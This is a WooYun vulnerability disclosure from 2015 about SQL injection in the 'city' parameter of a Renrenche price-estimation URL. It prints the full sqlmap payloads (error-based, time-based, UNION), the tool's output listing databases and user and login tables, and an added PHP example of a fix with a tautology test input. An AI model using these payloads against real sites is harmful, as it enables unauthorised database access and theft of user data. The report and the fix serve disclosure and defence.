WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
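2015-09-09: Details reported to the vendor; awaiting vendor handling
2015-09-09: Vendor confirmed; details disclosed to the vendor only
2015-09-19: Details disclosed to core white hats and experts in related fields
2015-09-29: Details disclosed to regular white hats
2015-10-09: Details disclosed to intern white hats
2015-10-24: Details disclosed to the public
SQL injection vulnerability on a Renrenche site
Injection point:
http://pinggu.renrenche.com/index.php?m=get_model_price&model_id=4147&register_time=2015-05&mile=1&token=TYZKELbm&city=119
Parameter: city
Running sqlmap against it: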
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: m=get_model_price&model_id=4147&register_time=2015-05&mile=1&token=TYZKELbm&city=119 OR (SELECT 4294 FROM(SELECT COUNT(*),CONCAT(0x71786a7671,(SELECT (ELT(4294=4294,1))),0x7178787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: m=get_model_price&model_id=4147&register_time=2015-05&mile=1&token=TYZKELbm&city=119 OR SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: m=get_model_price&model_id=4147&register_time=2015-05&mile=1&token=TYZKELbm&city=119 UNION ALL SELECT CONCAT(0x71786a7671,0x55466e6162684a635073,0x7178787071)-- 
---
[15:55:09] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.29
back-end DBMS: MySQL 5.0
[15:55:09] [INFO] fetching database names
[15:55:10] [INFO] the SQL query used returns 6 entries
[15:55:10] [INFO] retrieved: information_schema
[15:55:10] [INFO] retrieved: mysql
[15:55:10] [INFO] retrieved: performance_schema
[15:55:10] [INFO] retrieved: price_evaluate_online
[15:55:10] [INFO] retrieved: rrc
[15:55:11] [INFO] retrieved: rrc_friends
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] price_evaluate_online
[*] rrc
[*] rrc_friends
This appears to involve the main site's database and leaks user information.
Database: rrc
[147 tables]
+----------------------------------+
| backup_cm_appointment_20150815   |
| backup_cm_appointment_bak150312  |
| backup_cm_category               |
| backup_cm_ip                     |
| backup_cm_motion                 |
| backup_cm_promo                  |
| backup_rc_auth_code_history      |
| backup_rc_ci_sessions            |
| backup_rc_login_attempts         |
| backup_rc_sale_notify            |
| backup_rc_search_filter          |
| backup_rc_search_filter_bak      |
| backup_rc_user_autologin         |
| backup_rc_user_profiles          |
| backup_rc_users                  |
| cm_58brand                       |
| cm_58chexi                       |
| cm_58chexing                     |
| cm_appointment                   |
| cm_brand                         |
| cm_brand_and_series_info_view    |
| cm_car_info_view                 |
| cm_car_model                     |
| cm_car_series                    |
| cm_intent                        |
| cm_sold                          |
| cp_aftersale_address             |
Stopped it with Ctrl+C and did not run it any further...
Filter the input.
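The fix advice above, applied to the `city` parameter, as an added example that is not part of the original report and is not the vendor's code: the concatenated query pattern beside a validated, bound one. The table `model_price`, its columns and rows, and both function names are hypothetical, and an in-memory SQLite database stands in for the MySQL back end so the script runs offline.

```php
<?php
// Added example: table name, columns and rows are constructed for illustration.
// SQLite in memory stands in for the MySQL back end so the script runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE model_price (model_id INTEGER, city INTEGER, price INTEGER)');
$pdo->exec('INSERT INTO model_price VALUES (4147, 119, 88000), (4147, 120, 91000)');

// Vulnerable pattern: the raw parameter is concatenated into the statement,
// so anything after the number is parsed as SQL.
function price_vulnerable(PDO $pdo, $city) {
    $sql = "SELECT price FROM model_price WHERE model_id = 4147 AND city = $city";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: reject anything that is not a plain positive integer,
// then bind the value so it can never change the statement's structure.
function price_hardened(PDO $pdo, $city) {
    $id = filter_var($city, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('city must be a positive integer');
    }
    $stmt = $pdo->prepare(
        'SELECT price FROM model_price WHERE model_id = 4147 AND city = :city'
    );
    $stmt->bindValue(':city', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Second input is a constructed tautology with the same "119 OR ..." shape
// that the report's sqlmap output shows for this parameter.
$inputs = ['119', '119 OR 1=1'];
foreach ($inputs as $city) {
    echo 'city=' . json_encode($city) . "\n";
    echo '  concatenated:      ' . json_encode(price_vulnerable($pdo, $city)) . "\n";
    try {
        echo '  validated + bound: ' . json_encode(price_hardened($pdo, $city)) . "\n";
    } catch (InvalidArgumentException $e) {
        echo '  validated + bound: rejected (' . $e->getMessage() . ")\n";
    }
}
```

The concatenated query returns both cities' rows for the second input, while the hardened function rejects it before any SQL runs. The sqlmap output also lists six databases visible from this one endpoint, so a database account restricted to the application's own schema would limit what a similar flaw could reach.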
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-09-09 17:18
Thank you very much!
None yet